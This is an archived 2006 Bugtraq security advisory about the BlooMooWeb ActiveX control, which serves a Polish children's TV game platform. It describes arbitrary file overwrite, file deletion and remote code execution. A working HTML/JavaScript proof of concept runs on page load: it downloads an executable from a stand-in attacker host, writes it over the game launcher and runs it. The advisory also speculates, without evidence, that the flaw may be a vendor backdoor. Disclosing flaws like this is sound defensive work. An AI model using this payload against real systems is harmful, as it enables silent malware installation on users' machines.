ActiveX security leaks in the TV owned web game platform

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ActiveX security leaks in the TV owned web game platform
From: maxgipeh@xxxxxxxxx
Date: 31 Oct 2006 00:28:15 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

There is a security problem within the architecture / design issues 
of the BlooMooWeb ActiveX control.

BlooMooWeb is an internet game platform for kids, popular mainly 
in Poland. It has been provided for the TV programme
"Krolestwo Maciusia" ("The Kingdom of Macius") 
broadcast in TVP1 - first channel of Polish public television.

The flaws allows any malicious person who would induce the
remote user to click specified link, to
download silently and immediately execute
any attacker supplied code, in the current user context.



Technical description:


BlooMooWeb ActiveX control, using the CLSID idetifier
CLSID: 22E9EFBA-114C-4DA0-AE72-D8F2C7138002,
is being used by the web platform to download and install the game 
system files and later for particular game downloading / instalation purposes.

After game system is installed (installation of ActiveX control has 
been approved / BlooMooWeb platform has been downloaded and installed) 
the game system binaries and data are stored in the following directory:
C:/Program Files/AidemMedia/BlooMooWeb
and the default launch path is set to that directory.

Following 3 methods, being used for the scripting layer in 
data download / installation process, could be particularly intresting:

BW_DownloadFile(BSTR bstrUrl, BSTR bstrLocalFile,BSTR bstrCallback)
BW_LaunchGame(BSTR bstrParams)
BW_DeleteTempFile(BSTR filePath)

First of all it has to be said, that the control implemetation doesn't
have any protection allowing to distinguish between game platform 
data area and users system data area.
Therfore any path parameters passed to the controls methods can point anywhere 
outside the local installation place on the users harddrive.

BW_DownloadFile() method, using non-blocking streaming with callback 
system, downloads a remote file specified by the URL string bstrUrL parameter, 
streaming it down with the overwrite IO permission to the file 
pointed to by the bstrLocalFile parameter.
The third parameter is a callback function pointer which can be used to 
track visually(GUI) / silently the download progress.

The call to BW_LaunchGame method with any 
string argument will result in execution of the:
%BlooMooWebDirectory%/BlooMooWeb.exe 
binary (game platform core executable)
and new process spawning in the current user context.

After noticing that the control has only callbacks system and no GUI 
it should be a simple deal to execute it silently with no user interaction or 
signaling.

However, having full scripting access to the method that downloads 
any data with overwrite IO permission (including binaries) 
with no user interaction, to any directory on the 
users physical disk, it can be used to overwrite the default 
game-launcher binary BlooMooWeb.exe by an attacker chosen file.
After that, any single call to BW_LaunchGame() will spawn new process from 
the attackers supplied binary file.

Simplyfying - with just one users click on the attacker provided link,
the attacker supplied executable code (containing trojan-horse, 
virus, spy stuff, adWare, etc. )
can be downloaded silently and instantly executed within the users account 
privillages.

DoS type attack vector is introduced by BW_DeleteTempFile() method, 
not embedded with the internal ActiveX installer system, 
but available externally for scripting. 
It is used by the game installer engine to delete files after game
deinstallation and in other cleanup purposes.
It uses a single string argument, which can point to ANY file on the users 
physical disk.
That introduces another "creepy" scenario where 
the user induced by the malicious attacker to visit attacker-controlled site 
can simply by one-click on the link , wipe any 
data from own disk including erasing operating system core files leading to 
users OS crash.



Concluding:


The BlooMooWeb web game platform has been designed
by gaming company and TV producer - Aidem Media and started in January 2006
as a part of public Polish television show for kids called "Krolestwo Maciusia".
Since then it gained over 12000 forum registered users, with web chat, 
forums and ICQ/GG messaging prototocols indetity tracking.
Excluding the users that had their operating systems reinstalled or had chanded 
the ActiveX security policy of their 
browser since the game platform intallation, it could be expected 
that this web game system is wide spread and has rather big audience, 
in and outside Poland.
Taking into consideration that a TV supported / owned game platform
makes itself trustworthy enough to approve  ActiveX control installation,
the origins of flaw in this software, could be interpreted in two ways: 
as an accidental security vulnerability being a result of bad architecture 
design, 
or as a backdoor system into platform users machines, "accidentally" built in 
by the vendor.



Affected software:


Windows 98 SE
Windows 2000 SP4
Windows XP pro SP2
Windows 2003 Server Standard SP1
BlooMooWeb ActiveX CTL v1.0.9



Example PoC exploit showing remote execution of attacker supplied binary code:


<html>
<head>
<script language="JavaScript">

var binaryUrl="http://some_attacker_controlled_domain/attackerfile.exe";;

function spawn2()
{
        aa1=o2obj.GetInstallationDir(null);
        aa2="BlooMooWEB.exe";
        o2obj.BW_DownloadFile(binaryUrl,aa1+aa2,"callback001");
}

function callback001( msgCode, param1, param2, param3 )
{
        if(msgCode == 'DOWNLOAD_COMPLETE' )
        {
                o2obj.BW_LaunchGame("treleferekuku");
        }
}

</script>
</head>

<body onload="spawn2()"> 
<object ID="o2obj" WIDTH=0 HEIGHT=0
    CLASSID="CLSID:22E9EFBA-114C-4DA0-AE72-D8F2C7138002"
</object>
</body>
</html>




Solution:


-removal of BlooMooWeb ActiveX control binary, placed in:
 %WindowsDirectory%/dowloaded program files/AidemATL.dll

-turning off entirely ActiveX in the Browser settings (or switching the browser 
to a non-Microsoft one and forgetting about MS suicidal inventions)

-thinking twice before installation approval of any ActiveX driven software 
either unsigned or wide spread "big corp" signed



Links:


"The Kingdom of Macius" TV show official web page:
http://www.krolestwomaciusia.pl

BlooMooWeb game portal:
http://www.krolestwomaciusia.pl/bweb_aktualnosci.php

Polish public television main web page:
http://www.tvp.pl



information provided by Max Gipehtykrop of German Reverse Force 
maxgipeh@xxxxxxxxx

Prev by Date: phpMyConferences <= 8.0.2 Remote File Inclusion
Next by Date: Hawking Technology wireless router WR254-CA DNS issue
Previous by thread: ModSecurity 2.0, A Core Rule Set and Console now available
Next by thread: Hawking Technology wireless router WR254-CA DNS issue
Index(es):
- Date
- Thread